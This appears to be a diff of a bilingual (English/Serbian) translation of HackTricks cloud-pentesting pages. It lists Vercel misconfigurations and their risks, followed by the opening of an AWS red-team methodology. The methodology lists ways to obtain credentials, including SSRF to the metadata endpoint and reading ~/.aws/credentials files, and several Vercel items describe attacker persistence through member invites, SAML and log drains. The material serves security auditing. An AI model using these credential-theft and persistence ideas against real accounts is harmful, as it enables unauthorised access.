- **Pogrešna konfiguracija:** Integracija sa nepouzdanim ili neosiguranim uslugama trećih strana.
- **Rizik:** Uvođenje ranjivosti, curenje podataka ili zadnja vrata kroz kompromitovane integracije.
- **Prekomerno ovlašćene integracije**
- **Pogrešna konfiguracija:** Dodeljivanje prekomernih dozvola integrisanim uslugama.
- **Rizik:** Neovlašćen pristup resursima projekta, manipulacija podacima ili prekidi usluga.
- **Nedostatak praćenja integracija**
- **Pogrešna konfiguracija:** Nepratiti i neauditovati integracije trećih strana.
- **Rizik:** Odloženo otkrivanje kompromitovanih integracija, povećavajući potencijalni uticaj bezbednosnih povreda.
---
### Deployment Protection
### Zaštita implementacije
**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments.
**Svrha:** Osiguranje implementacija kroz različite mehanizme zaštite, kontrolišući ko može pristupiti i implementirati u vaša okruženja.
#### Security Configurations:
#### Konfiguracije bezbednosti:
**Vercel Authentication**
**Vercel autentifikacija**
- **Misconfiguration:** Disabling authentication or not enforcing team member checks.
- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse.
- **Pogrešna konfiguracija:** Onemogućavanje autentifikacije ili neprovođenje provere članova tima.
- **Rizik:** Neovlašćeni korisnici mogu pristupiti implementacijama, što dovodi do curenja podataka ili zloupotrebe aplikacija.
**Protection Bypass for Automation**
**Zaštita zaobilaženja za automatizaciju**
- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets.
- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments.
- **Pogrešna konfiguracija:** Javna izloženost tajne zaobilaženja ili korišćenje slabih tajni.
- **Rizik:** Napadači mogu zaobići zaštitu implementacije, pristupajući i manipulišući zaštićenim implementacijama.
**Shareable Links**
**Deljivi linkovi**
- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links.
- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions.
- **Pogrešna konfiguracija:** Deljenje linkova bez razmišljanja ili neukidanje zastarelih linkova.
- **Rizik:** Neovlašćen pristup zaštićenim implementacijama, zaobilazeći autentifikaciju i IP ograničenja.
**OPTIONS Allowlist**
- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints.
- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks.
- **Pogrešna konfiguracija:** Preširoko dozvoljavanje putanja ili osetljivih krajnjih tačaka.
- **Rizik:** Napadači mogu iskoristiti nezaštićene putanje za izvođenje neovlašćenih radnji ili zaobilaženje bezbednosnih provera.
**Password Protection**
**Zaštita lozinkom**
- **Misconfiguration:** Using weak passwords or sharing them insecurely.
- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked.
- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
- **Pogrešna konfiguracija:** Korišćenje slabih lozinki ili njihovo nesigurno deljenje.
- **Rizik:** Neovlašćen pristup implementacijama ako se lozinke pogode ili procure.
- **Napomena:** Dostupno na **Pro** planu kao deo **Napredne zaštite implementacije** za dodatnih $150/mesečno.
**Deployment Protection Exceptions**
**Izuzeci zaštite implementacije**
- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently.
- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access.
- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
- **Pogrešna konfiguracija:** Nehotice dodavanje produkcijskih ili osetljivih domena na listu izuzetaka.
- **Rizik:** Izlaganje kritičnih implementacija javnosti, što dovodi do curenja podataka ili neovlašćenog pristupa.
- **Napomena:** Dostupno na **Pro** planu kao deo **Napredne zaštite implementacije** za dodatnih $150/mesečno.
**Trusted IPs**
**Poverljivi IP-ovi**
- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges.
- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access.
- **Note:** Available on the **Enterprise** plan.
- **Pogrešna konfiguracija:** Pogrešno određivanje IP adresa ili CIDR opsega.
- **Rizik:** Legitimni korisnici mogu biti blokirani ili neovlašćeni IP-ovi mogu dobiti pristup.
- **Napomena:** Dostupno na **Enterprise** planu.
---
### Functions
### Funkcije
**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies.
**Svrha:** Konfigurišite serverless funkcije, uključujući podešavanja vremena izvršavanja, alokaciju memorije i bezbednosne politike.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Nothing**
- **Ništa**
---
### Data Cache
### Keš podataka
**Purpose:** Manage caching strategies and settings to optimize performance and control data storage.
**Svrha:** Upravljanje strategijama i podešavanjima keširanja za optimizaciju performansi i kontrolu skladištenja podataka.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Purge Cache**
- **Misconfiguration:** It allows to delete all the cache.
- **Risk:** Unauthorized users deleting the cache leading to a potential DoS.
- **Očisti keš**
- **Pogrešna konfiguracija:** Omogućava brisanje celog keša.
- **Rizik:** Neovlašćeni korisnici brišu keš, što može dovesti do potencijalnog DoS.
---
### Cron Jobs
### Cron poslovi
**Purpose:** Schedule automated tasks and scripts to run at specified intervals.
**Svrha:** Zakazivanje automatizovanih zadataka i skripti da se izvršavaju u određenim intervalima.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Disable Cron Job**
- **Misconfiguration:** It allows to disable cron jobs declared inside the code
- **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for)
- **Onemogući Cron posao**
- **Pogrešna konfiguracija:** Omogućava onemogućavanje cron poslova deklarisanih unutar koda
- **Rizik:** Potencijalno prekidanje usluge (u zavisnosti od svrhe cron poslova)
---
### Log Drains
**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing.
**Svrha:** Konfigurišite spoljne usluge za logovanje kako biste zabeležili i čuvali logove aplikacije za praćenje i reviziju.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- Nothing (managed from teams settings)
- Ništa (upravljano iz podešavanja timova)
---
### Security
### Bezbednost
**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more.
**Svrha:** Centralno mesto za različita podešavanja vezana za bezbednost koja utiču na pristup projektu, zaštitu izvora i još mnogo toga.
#### Security Configurations:
#### Konfiguracije bezbednosti:
**Build Logs and Source Protection**
**Logovi izgradnje i zaštita izvora**
- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly.
- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities.
- **Pogrešna konfiguracija:** Onemogućavanje zaštite ili izlaganje `/logs` i `/src` putanja javnosti.
- **Rizik:** Neovlašćen pristup logovima izgradnje i izvoru koda, što dovodi do curenja informacija i potencijalne eksploatacije ranjivosti.
**Git Fork Protection**
**Zaštita Git forkova**
- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews.
- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors.
- **Pogrešna konfiguracija:** Omogućavanje neovlašćenih pull zahteva bez odgovarajućih pregleda.
- **Rizik:** Zlonamerni kod može biti spojen u kodnu bazu, uvodeći ranjivosti ili zadnja vrata.
**Secure Backend Access with OIDC Federation**
**Siguran pristup backend-u sa OIDC federacijom**
- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs.
- **Risk:** Unauthorized access to backend services through flawed authentication flows.
- **Pogrešna konfiguracija:** Pogrešno postavljanje OIDC parametara ili korišćenje nesigurnih URL-ova izdavača.
- **Rizik:** Neovlašćen pristup backend uslugama kroz neispravne tokove autentifikacije.
**Deployment Retention Policy**
**Politika zadržavanja implementacija**
- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention).
- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments.
- **Pogrešna konfiguracija:** Postavljanje perioda zadržavanja prekratko (gubitak istorije implementacija) ili predugo (nepotrebno zadržavanje podataka).
- **Rizik:** Nemogućnost vraćanja na prethodne verzije kada je to potrebno ili povećan rizik od izlaganja podataka iz starih implementacija.
**Recently Deleted Deployments**
**Nedavno obrisane implementacije**
- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions.
- **Risk:** Loss of critical deployment history, hindering audits and rollbacks.
- **Pogrešna konfiguracija:** Nepratiti obrisane implementacije ili se oslanjati isključivo na automatska brisanja.
- **Rizik:** Gubitak kritične istorije implementacija, otežavajući revizije i vraćanja.
---
### Advanced
### Napredno
**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security.
**Svrha:** Pristup dodatnim podešavanjima projekta za fino podešavanje konfiguracija i poboljšanje bezbednosti.
#### Security Configurations:
#### Konfiguracije bezbednosti:
**Directory Listing**
**Lista direktorijuma**
- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file.
- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks.
- **Pogrešna konfiguracija:** Omogućavanje liste direktorijuma omogućava korisnicima da vide sadržaj direktorijuma bez datoteke indeksa.
- **Rizik:** Izlaganje osetljivih datoteka, strukture aplikacije i potencijalnih ulaznih tačaka za napade.
---
## Project Firewall
## Firewall projekta
### Firewall
#### Security Configurations:
#### Konfiguracije bezbednosti:
**Enable Attack Challenge Mode**
**Omogući izazov napada**
- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability
- **Risk:** Potential user experience problems.
- **Pogrešna konfiguracija:** Omogućavanje ovoga poboljšava odbranu web aplikacije protiv DoS, ali na račun upotrebljivosti
- **Rizik:** Potencijalni problemi sa korisničkim iskustvom.
### Custom Rules & IP Blocking
### Prilagođena pravila i blokiranje IP-a
- **Misconfiguration:** Allows to unblock/block traffic
- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic
- **Pogrešna konfiguracija:** Omogućava otključavanje/blokiranje saobraćaja
- **Rizik:** Potencijalni DoS omogućavajući zlonameran saobraćaj ili blokirajući benigni saobraćaj
---
## Project Deployment
## Implementacija projekta
### Source
### Izvor
- **Misconfiguration:** Allows access to read the complete source code of the application
- **Risk:** Potential exposure of sensitive information
- **Pogrešna konfiguracija:** Omogućava pristup za čitanje kompletnog izvornog koda aplikacije
- **Rizik:** Potencijalno izlaganje osetljivih informacija
### Skew Protection
### Zaštita od pomeranja
- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other.
- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future
- **Pogrešna konfiguracija:** Ova zaštita osigurava da klijentska i serverska aplikacija uvek koriste istu verziju kako ne bi došlo do desinkronizacije kada klijent koristi drugačiju verziju od servera i stoga se ne razumeju.
- **Rizik:** Onemogućavanje ovoga (ako je omogućeno) moglo bi izazvati DoS probleme u novim implementacijama u budućnosti
---
## Team Settings
## Podešavanja tima
### General
### Opšte
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Transfer**
- **Misconfiguration:** Allows to transfer all the projects to another team
- **Risk:** An attacker could steal the projects
- **Delete Project**
- **Misconfiguration:** Allows to delete the team with all the projects&#x20;
- **Risk:** Delete the projects
- **Prenos**
- **Pogrešna konfiguracija:** Omogućava prenos svih projekata na drugi tim
- **Rizik:** Napadač bi mogao ukrasti projekte
- **Brisanje projekta**
- **Pogrešna konfiguracija:** Omogućava brisanje tima sa svim projektima&#x20;
- **Rizik:** Brisanje projekata
---
### Billing
### Fakturisanje
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Speed Insights Cost Limit**
- **Misconfiguration:** An attacker could increase this number
- **Risk:** Increased costs
- **Limit troškova Speed Insights**
- **Pogrešna konfiguracija:** Napadač bi mogao povećati ovaj broj
- **Rizik:** Povećani troškovi
---
### Members
### Članovi
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Add members**
- **Misconfiguration:** An attacker could maintain persitence inviting an account he control
- **Risk:** Attacker persistence
- **Roles**
- **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
- **Risk**: Increate the exposure of the Vercel Team
- **Dodaj članove**
- **Pogrešna konfiguracija:** Napadač bi mogao održati postojanost pozivajući nalog koji kontroliše
- **Rizik:** Postojanost napadača
- **Uloge**
- **Pogrešna konfiguracija:** Dodeljivanje previše dozvola ljudima kojima to nije potrebno povećava rizik od konfiguracije Vercela. Proverite sve moguće uloge na [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
- **Rizik**: Povećava izloženost Vercel tima
---
### Access Groups
### Grupe pristupa
An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects.
**Grupa pristupa** u Vercelu je kolekcija projekata i članova tima sa unapred definisanim dodelama uloga, omogućavajući centralizovano i pojednostavljeno upravljanje pristupom kroz više projekata.
**Potential Misconfigurations:**
**Potencijalne pogrešne konfiguracije:**
- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions.
- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation.
- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended.
- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions.
- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps.
- **Prekomerno ovlašćivanje članova:** Dodeljivanje uloga sa više dozvola nego što je potrebno, što dovodi do neovlašćenog pristupa ili radnji.
- **Pogrešne dodela uloga:** Pogrešno dodeljivanje uloga koje se ne poklapaju sa odgovornostima članova tima, uzrokujući eskalaciju privilegija.
- **Nedostatak segregacije projekata:** Neodvajanje osetljivih projekata, omogućavajući širi pristup nego što je planirano.
- **Nedovoljno upravljanje grupama:** Nepravilno pregledanje ili ažuriranje grupa pristupa, što rezultira zastarelim ili neprimerenim dozvolama pristupa.
- **Nepodudarne definicije uloga:** Korišćenje nepodudarnih ili nejasnih definicija uloga kroz različite grupe pristupa, što dovodi do konfuzije i bezbednosnih praznina.
---
### Log Drains
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Log Drains to third parties:**
- **Misconfiguration:** An attacker could configure a Log Drain to steal the logs
- **Risk:** Partial persistence
- **Log Drains ka trećim stranama:**
- **Pogrešna konfiguracija:** Napadač bi mogao konfigurisati Log Drain da ukrade logove
- **Rizik:** Delimična postojanost
---
### Security & Privacy
### Bezbednost i privatnost
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard.
- **Misconfiguration:**&#x20;
- Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting.
- Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain.
- **Risks:**
- **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team.
- **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals.
- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access.
- **Misconfiguration:** Not adding critical Git scopes to the protected list.
- **Risks:**
- **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization.
- **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team.
- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system.
- **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled.
- **Risks:**
- **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members.
- **Data Breach:** Sensitive information like API keys and credentials could be leaked.
- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members.
- **Misconfiguration:**\
Granting access to audit logs to unauthorized team members.
- **Risks:**
- **Privacy Violations:** Exposure of sensitive user activities and data.
- **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks.
- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management.
- **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints.
- **Risk:** Maintain persistence
- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains.
- **Misconfiguration:** Leaving IP address visibility enabled without necessity.
- **Risks:**
- **Privacy Violations:** Non-compliance with data protection regulations like GDPR.
- **Legal Repercussions:** Potential fines and penalties for mishandling personal data.
- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing.
- **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic.
- **Risks:**
- **Service Denial to Legitimate Users:** Blocking access for valid users or partners.
- **Operational Disruptions:** Loss of service availability for certain regions or clients.
- **Domen e-pošte tima:** Kada je konfigurisano, ovo podešavanje automatski poziva Vercel lične naloge sa adresama e-pošte koje se završavaju na specificiranom domenu (npr. `mydomain.com`) da se pridruže vašem timu prilikom registracije i na kontrolnoj tabli.
- **Pogrešna konfiguracija:**&#x20;
- Određivanje pogrešnog domena e-pošte ili pogrešno napisani domen u podešavanju domena e-pošte tima.
- Korišćenje uobičajenog domena e-pošte (npr. `gmail.com`, `hotmail.com`) umesto domena specifičnog za kompaniju.
- **Rizici:**
- **Neovlašćen pristup:** Korisnici sa adresama e-pošte iz neplaniranih domena mogu primiti pozivnice da se pridruže vašem timu.
- **Izlaganje podataka:** Potencijalno izlaganje osetljivih informacija o projektu neovlašćenim osobama.
- **Zaštićeni Git opsezi:** Omogućava vam da dodate do 5 Git opsega vašem timu kako biste sprečili druge Vercel timove da implementiraju repozitorijume iz zaštićenog opsega. Više timova može odrediti isti opseg, omogućavajući pristup obema timovima.
- **Pogrešna konfiguracija:** Ne dodavanje kritičnih Git opsega na zaštićenu listu.
- **Rizici:**
- **Neovlašćene implementacije:** Drugi timovi mogu implementirati repozitorijume iz Git opsega vaše organizacije bez autorizacije.
- **Izlaganje intelektualne svojine:** Proprietarni kod bi mogao biti implementiran i dostupan izvan vašeg tima.
- **Politike varijabli okruženja:** Sprovodi politike za kreiranje i uređivanje varijabli okruženja tima. Konkretno, možete sprovoditi da se sve varijable okruženja kreiraju kao **Osetljive varijable okruženja**, koje može dekriptovati samo Vercelov sistem implementacije.
- **Pogrešna konfiguracija:** Održavanje onemogućavanja osetljivih varijabli okruženja.
- **Rizici:**
- **Izlaganje tajni:** Varijable okruženja mogu biti pregledane ili uređene od strane neovlašćenih članova tima.
- **Curanje podataka:** Osetljive informacije kao što su API ključevi i kredencijali mogli bi procureti.
- **Revizijski log:** Pruža izvoz aktivnosti tima za poslednjih do 90 dana. Revizijski logovi pomažu u praćenju i praćenju radnji koje su izvršili članovi tima.
- **Pogrešna konfiguracija:**\
Dodeljivanje pristupa revizijskim logovima neovlašćenim članovima tima.
- **Rizici:**
- **Povrede privatnosti:** Izlaganje osetljivih korisničkih aktivnosti i podataka.
- **Manipulacija logovima:** Zlonamerni akteri mogli bi izmeniti ili obrisati logove kako bi prikrili svoje tragove.
- **SAML jedinstveno prijavljivanje:** Omogućava prilagođavanje SAML autentifikacije i sinhronizacije direktorijuma za vaš tim, omogućavajući integraciju sa provajderom identiteta (IdP) za centralizovanu autentifikaciju i upravljanje korisnicima.
- **Pogrešna konfiguracija:** Napadač bi mogao postaviti zadnja vrata u tim postavljanjem SAML parametara kao što su ID entiteta, SSO URL ili otisci sertifikata.
- **Rizik:** Održavanje postojanosti
- **Vidljivost IP adresa:** Kontroliše da li se IP adrese, koje se mogu smatrati ličnim informacijama prema određenim zakonima o zaštiti podataka, prikazuju u upitima za praćenje i Log Drains.
- **Pogrešna konfiguracija:** Ostaviti vidljivost IP adresa omogućenom bez potrebe.
- **Rizici:**
- **Povrede privatnosti:** Neusaglašenost sa propisima o zaštiti podataka kao što je GDPR.
- **Pravne posledice:** Potencijalne kazne i sankcije za nepravilno rukovanje ličnim podacima.
- **Blokiranje IP adresa:** Omogućava konfiguraciju IP adresa i CIDR opsega koje Vercel treba da blokira zahteve. Blokirani zahtevi ne doprinose vašem fakturisanju.
- **Pogrešna konfiguracija:** Može biti zloupotrebljeno od strane napadača da omogući zlonamerni saobraćaj ili blokira legitimni saobraćaj.
- **Rizici:**
- **Odbijanje usluge legitimnim korisnicima:** Blokiranje pristupa validnim korisnicima ili partnerima.
- **Operativni prekidi:** Gubitak dostupnosti usluga za određene regione ili klijente.
---
### Secure Compute
### Sigurno računanje
**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy.
**Vercel Secure Compute** omogućava sigurne, privatne veze između Vercel funkcija i backend okruženja (npr. baza podataka) uspostavljanjem izolovanih mreža sa posvećenim IP adresama. Ovo eliminiše potrebu za javnim izlaganjem backend usluga, poboljšavajući bezbednost, usklađenost i privatnost.
#### **Potential Misconfigurations and Risks**
#### **Potencijalne pogrešne konfiguracije i rizici**
1. **Incorrect AWS Region Selection**
- **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region.
- **Risk:** Increased latency, potential data residency compliance issues, and degraded performance.
2. **Overlapping CIDR Blocks**
- **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks.
- **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks.
3. **Improper VPC Peering Configuration**
- **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates).
- **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches.
4. **Excessive Project Assignments**
- **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation.
- **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others.
5. **Inadequate IP Address Management**
- **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately.
- **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities.
6. **Including Build Containers Unnecessarily**
- **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds.
- **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources.
7. **Failure to Securely Handle Bypass Secrets**
- **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections.
- **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code.
8. **Ignoring Region Failover Configurations**
- **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings.
- **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency.
9. **Exceeding VPC Peering Connection Limits**
- **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections).
- **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions.
10. **Insecure Network Settings**
- **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network.
- **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks.
1. **Pogrešan izbor AWS regiona**
- **Pogrešna konfiguracija:** Odabir AWS regiona za Secure Compute mrežu koji se ne poklapa sa regionom backend usluga.
- **Rizik:** Povećana latencija, potencijalni problemi sa usklađenošću podataka i degradacija performansi.
2. **Preklapanje CIDR blokova**
- **Pogrešna konfiguracija:** Odabir CIDR blokova koji se preklapaju sa postojećim VPC-ima ili drugim mrežama.
- **Rizik:** Mrežni konflikti koji dovode do neuspešnih veza, neovlašćenog pristupa ili curenja podataka između mreža.
3. **Pogrešna konfiguracija VPC peeringa**
- **Pogrešna konfiguracija:** Pogrešno postavljanje VPC peeringa (npr. pogrešni VPC ID-ovi, nepotpune izmene tabele ruta).
- **Rizik:** Neovlašćen pristup backend infrastrukturi, neuspešne sigurne veze i potencijalna curenja podataka.
4. **Prekomerna dodela projekata**
- **Pogrešna konfiguracija:** Dodeljivanje više projekata jednoj Secure Compute mreži bez odgovarajuće izolacije.
- **Rizik:** Izloženost zajedničkog IP-a povećava površinu napada, potencijalno omogućavajući kompromitovanim projektima da utiču na druge.
5. **Neadekvatno upravljanje IP adresama**
- **Pogrešna konfiguracija:** Neupravljanje ili nerotiranje posvećenih IP adresa na odgovarajući način.
- **Rizik:** IP spoofing, ranjivosti praćenja i potencijalno stavljanje na crnu listu ako su IP adrese povezane sa zlonamernim aktivnostima.
6. **Nepravilno uključivanje kontejnera za izgradnju**
- **Pogrešna konfiguracija:** Dodavanje kontejnera za izgradnju u Secure Compute mrežu kada pristup backend-u nije potreban tokom izgradnje.
- **Rizik:** Povećana površina napada, produženi vremenski okviri za snabdevanje i nepotrebna potrošnja mrežnih resursa.
7. **Neuspeh u sigurnom rukovanju tajnama zaobilaženja**
- **Pogrešna konfiguracija:** Izlaganje ili nepravilno rukovanje tajnama korišćenim za zaobilaženje zaštite implementacije.
- **Rizik:** Neovlašćen pristup zaštićenim implementacijama, omogućavajući napadačima da manipulišu ili implementiraju zlonamerni kod.
8. **Ignorisanje konfiguracija za prebacivanje regiona**
- **Pogrešna konfiguracija:** Neuspostavljanje pasivnih regiona za prebacivanje ili pogrešno konfigurisanje postavki prebacivanja.
- **Rizik:** Downtime usluge tokom prekida u primarnom regionu, što dovodi do smanjene dostupnosti i potencijalne neusklađenosti podataka.
9. **Prekoračenje limita veza VPC peeringa**
- **Pogrešna konfiguracija:** Pokušaj uspostavljanja više VPC peering veza nego što je dozvoljeno (npr. prekoračenje 50 veza).
- **Rizik:** Nemogućnost sigurne povezanosti potrebnih backend usluga, uzrokujući neuspehe implementacije i operativne prekide.
10. **Neosigurana mrežna podešavanja**
- **Pogrešna konfiguracija:** Slaba pravila vatrozida, nedostatak enkripcije ili nepravilna segmentacija mreže unutar Secure Compute mreže.
- **Rizik:** Presretanje podataka, neovlašćen pristup backend uslugama i povećana ranjivost na napade.
---
### Environment Variables
### Varijable okruženja
**Purpose:** Manage environment-specific variables and secrets used by all the projects.
**Svrha:** Upravljanje varijablama i tajnama specifičnim za okruženje koje koriste svi projekti.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Exposing Sensitive Variables**
- **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
- **Sensitive disabled**
- **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
- **Izlaganje osetljivih varijabli**
- **Pogrešna konfiguracija:** Prefiksiranje osetljivih varijabli sa `NEXT_PUBLIC_`, čineći ih dostupnim na klijentskoj strani.
- **Rizik:** Izlaganje API ključeva, kredencijala baze podataka ili drugih osetljivih podataka javnosti, što dovodi do curenja podataka.
- **Osetljivo onemogućeno**
- **Pogrešna konfiguracija:** Ako je onemogućeno (podrazumevano) moguće je pročitati vrednosti generisanih tajni.
- **Rizik:** Povećana verovatnoća slučajnog izlaganja ili neovlašćenog pristupa osetljivim informacijama.
{{#include ../banners/hacktricks-training.md}}

202
src/pentesting-cloud/aws-security/README.md
View File

@@ -2,17 +2,17 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
**Pre nego što započnete pentesting** **AWS** okruženja, postoji nekoliko **osnovnih stvari koje treba da znate** o tome kako AWS funkcioniše kako biste razumeli šta treba da radite, kako da pronađete pogrešne konfiguracije i kako da ih iskoristite.
Concepts such as organization hierarchy, IAM and other basic concepts are explained in:
Koncepti kao što su hijerarhija organizacije, IAM i drugi osnovni koncepti su objašnjeni u:
{{#ref}}
aws-basic-information/
{{#endref}}
## Labs to learn
## Laboratorije za učenje
- [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat)
- [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable)
@@ -22,49 +22,49 @@ aws-basic-information/
- [http://flaws.cloud/](http://flaws.cloud/)
- [http://flaws2.cloud/](http://flaws2.cloud/)
Tools to simulate attacks:
Alati za simulaciju napada:
- [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/)
- [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main)
## AWS Pentester/Red Team Methodology
## AWS Pentester/Red Team metodologija
In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected.
Da biste auditovali AWS okruženje, veoma je važno znati: koje **usluge se koriste**, šta je **izloženo**, ko ima **pristup** čemu, i kako su interne AWS usluge povezane sa **spoljnim uslugama**.
From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
Sa stanovišta Red Teama, **prvi korak za kompromitovanje AWS okruženja** je da uspete da dobijete neke **akreditive**. Ovde su neke ideje kako to učiniti:
- **Leaks** in github (or similar) - OSINT
- **Social** Engineering
- **Password** reuse (password leaks)
- Vulnerabilities in AWS-Hosted Applications
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
- **Local File Read**
- `/home/USERNAME/.aws/credentials`
- `C:\Users\USERNAME\.aws\credentials`
- 3rd parties **breached**
- **Internal** Employee
- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials
- **Leakovi** na github-u (ili sličnim mestima) - OSINT
